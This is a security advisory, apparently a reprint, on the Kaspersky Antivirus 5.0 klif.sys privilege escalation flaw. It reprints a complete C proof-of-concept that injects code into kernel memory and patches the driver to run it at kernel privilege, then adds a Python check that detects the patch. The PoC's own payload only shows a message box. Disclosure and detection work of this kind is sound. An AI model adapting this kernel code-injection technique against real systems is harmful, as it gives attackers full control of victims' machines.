
Kaspersky Antivirus klif.sys Privilege Escalation Vulnerability

  Affected systems:
  Kaspersky Labs Kaspersky Antivirus 5.0.335
  Kaspersky Labs Kaspersky Antivirus 5.0.228
  Kaspersky Labs Kaspersky Antivirus 5.0.227
  Description:
  --------------------------------------------------------------------------------
  BUGTRAQ  ID: 13878
  Kaspersky is a very widely used antivirus product.
  The Kaspersky software on the Microsoft Windows 2000 platform has a design flaw that a local attacker can exploit to escalate privileges.
  The cause is that the Kaspersky kernel driver klif.sys does not correctly relinquish its elevated privileges; an attacker can exploit this flaw to execute arbitrary code with system kernel privileges.
  <*Source: Ilya Rabinovich (info@softsphere.com)
  Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111817777430401&w=2
  *>
  Test method:
  --------------------------------------------------------------------------------
  Warning
  The following program (method) may be offensive in nature and is provided solely for security research and teaching purposes. Users bear the risk themselves!
  //(C) by Ilya Rabinovich.
  #include <windows.h>

  //Fixed klif.sys addresses for the affected builds (see GetKAVRetAddress).
  PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;
  PDWORD pJmpAddress=(PDWORD)0xBE9372B0;
  PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046};
  PUCHAR pKAVRet;

  //Ring-0 payload: GetModuleFileNameA, compare with the stored notepad path,
  //and on a match call MessageBoxA. The three imm32 slots are filled at run time.
  unsigned char code[]={
    0x68,0x00,0x02,0x00,0x00,    //push 0x200
    0x68,0x00,0x80,0x93,0xBE,    //push 0xBE938000
    0x6A,0x00,                   //push 0
    0xB8,0x00,0x00,0x00,0x00,    //mov eax, -> +13
    0xFF,0xD0,                   //call eax
    0x68,0x00,0x80,0x93,0xBE,    //push 0xBE938000
    0x68,0x00,0x82,0x93,0xBE,    //push 0xBE938200
    0xB8,0x00,0x00,0x00,0x00,    //mov eax, -> +30
    0xFF,0xD0,                   //call eax
    0x85,0xC0,                   //test eax,eax
    0x74,0x03,                   //je +03
    0xC2,0x04,0x00,              //retn 4
    0x6A,0x00,                   //push 0
    0x68,0x00,0x84,0x93,0xBE,    //push 0xBE938400
    0x68,0x00,0x84,0x93,0xBE,    //push 0xBE938400
    0x6A,0x00,                   //push 0
    0xB8,0x00,0x00,0x00,0x00,    //mov eax, -> +58
    0xFF,0xD0,                   //call eax
    0xC2,0x04,0x00               //retn 4
  };
  unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword ptr [0xBE9372B0]
  //////////////////////////////////////////////////////////////
  BOOLEAN LoadExploitIntoKernelMemory(void){
    //Get function's addresses
    HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
    HANDLE hUser=GetModuleHandle("USER32.DLL");
    FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
    FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");
    FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");
    *(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
    *(DWORD*)(code+30)=(DWORD)plstrcmpiA;
    *(DWORD*)(code+58)=(DWORD)pMessageBoxA;
    //Prepare our data into ring0-zone.
    PCHAR pNotepadName=(PCHAR)0xBE938200;
    char temp_buffer[MAX_PATH];
    char *s;
    SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
    lstrcpy(pNotepadName,temp_buffer);
    PCHAR pMessage=(PCHAR)0xBE938400;
    lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");
    memmove(pCodeBase,code,sizeof(code));
    *pJmpAddress=(DWORD)pCodeBase;
    memmove(pKAVRet,jmp_code,sizeof(jmp_code));
    return TRUE;
  }
  ///////////////////////////////////////////////////////////////
  void UnloadExploitFromKernelMemory(){
    //Restore the original retn 4 epilogue.
    UCHAR retn_4[]={0xC2,0x04,0x00};
    memmove(pKAVRet,retn_4,sizeof(retn_4));
  }
  /////////////////////////////////////////////////////////////////
  PUCHAR GetKAVRetAddress(void){
    //Check the retn 4 in the KAV 0xBE9334E1 function end
    //Also, we check the KAV klif.sys existance.
    UCHAR retn_4[]={0xC2,0x04,0x00};
    __try{
      for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){
        if(memcmp(pKAVRets[i],retn_4,sizeof(retn_4))==0)
          return pKAVRets[i];
      }
    }__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is not installed",NULL,0);return NULL;}
    MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of KAV",NULL,0);
    return NULL;
  }
  /////////////////////////////////////////////////////////////////
  void main(void){
    pKAVRet=GetKAVRetAddress();
    if(NULL==pKAVRet)
      return;
    if(!LoadExploitIntoKernelMemory())
      return;
    char temp_buffer[MAX_PATH];
    char *s;
    SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);
    PROCESS_INFORMATION pi;
    STARTUPINFO si={0};
    si.cb=sizeof(si);
    CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
                  0,NULL,NULL,&si,&pi);
    WaitForSingleObject(pi.hProcess,INFINITE);
    MessageBox(NULL,"Now you may start your own Notepad instance to check this exploit!","KAV_EXPLOITER",0);
    MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);
    UnloadExploitFromKernelMemory();
  }
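  The PoC above works by overwriting the `retn 4` epilogue at one of the two klif.sys addresses it lists with a `jmp dword ptr [0xBE9372B0]`. As an added defensive example (not part of the original advisory or Rabinovich's code), the integrity check below runs over a constructed byte dump standing in for the driver's code region and reports, for each epilogue, whether it is still intact or has been replaced by an indirect jmp, decoding the pointer slot that jmp reads. The dump base address 0xBE935000 and the dump contents are assumptions for the sample.

```python
import struct

# Values taken from the advisory's PoC: the two klif.sys epilogue addresses it
# probes (one per affected build) and the pointer slot its patch jumps through.
KAV_RET_ADDRESSES = (0xBE935087, 0xBE935046)
KAV_JMP_SLOT = 0xBE9372B0
RETN_4 = bytes([0xC2, 0x04, 0x00])   # retn 4: the expected, untouched epilogue
JMP_IND = bytes([0xFF, 0x25])        # jmp dword ptr [abs32]: the PoC's 6-byte patch


def check_epilogue(dump, base, addr):
    """Classify the bytes at kernel address `addr` inside `dump`, whose first
    byte lives at `base`. Returns (state, jmp_slot), where jmp_slot is the
    absolute pointer an indirect jmp reads through, or None."""
    off = addr - base
    if off < 0 or off + len(RETN_4) > len(dump):
        return ("out-of-range", None)
    if dump[off:off + 3] == RETN_4:
        return ("intact", None)
    if dump[off:off + 2] == JMP_IND and off + 6 <= len(dump):
        slot = struct.unpack_from("<I", dump, off + 2)[0]
        return ("patched-jmp", slot)
    return ("modified", None)


def scan_epilogues(dump, base, addrs=KAV_RET_ADDRESSES):
    """Check every epilogue the PoC targets; any non-'intact' entry is a finding."""
    return {addr: check_epilogue(dump, base, addr) for addr in addrs}


def build_sample(patched=False):
    """Constructed stand-in for a 256-byte dump of klif.sys code at the assumed
    base 0xBE935000: NOPs with `retn 4` at both advisory addresses; with
    patched=True the first epilogue carries the PoC's jmp through KAV_JMP_SLOT."""
    base = 0xBE935000
    dump = bytearray(b"\x90" * 0x100)
    for addr in KAV_RET_ADDRESSES:
        dump[addr - base:addr - base + 3] = RETN_4
    if patched:
        off = KAV_RET_ADDRESSES[0] - base
        dump[off:off + 6] = JMP_IND + struct.pack("<I", KAV_JMP_SLOT)
    return base, bytes(dump)


if __name__ == "__main__":
    for patched in (False, True):
        base, dump = build_sample(patched)
        for addr, (state, slot) in scan_epilogues(dump, base).items():
            extra = f" -> slot 0x{slot:08X}" if slot is not None else ""
            print(f"0x{addr:08X}: {state}{extra}")
```

On a real system the same check would be fed a dump of the loaded driver's code section taken by a kernel-mode integrity tool, and compared against the on-disk klif.sys image rather than a constructed buffer.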
  Recommendations:
  --------------------------------------------------------------------------------
  Vendor patch:
  Kaspersky Labs
  --------------
  The vendor has not yet released a patch or upgrade program; we recommend that users of this software monitor the vendor's homepage for the latest version:
  http://www.kaspersky.com/
 


    Article author: 福州军威计算机技术有限公司 (Fuzhou Junwei Computer Technology Co., Ltd.)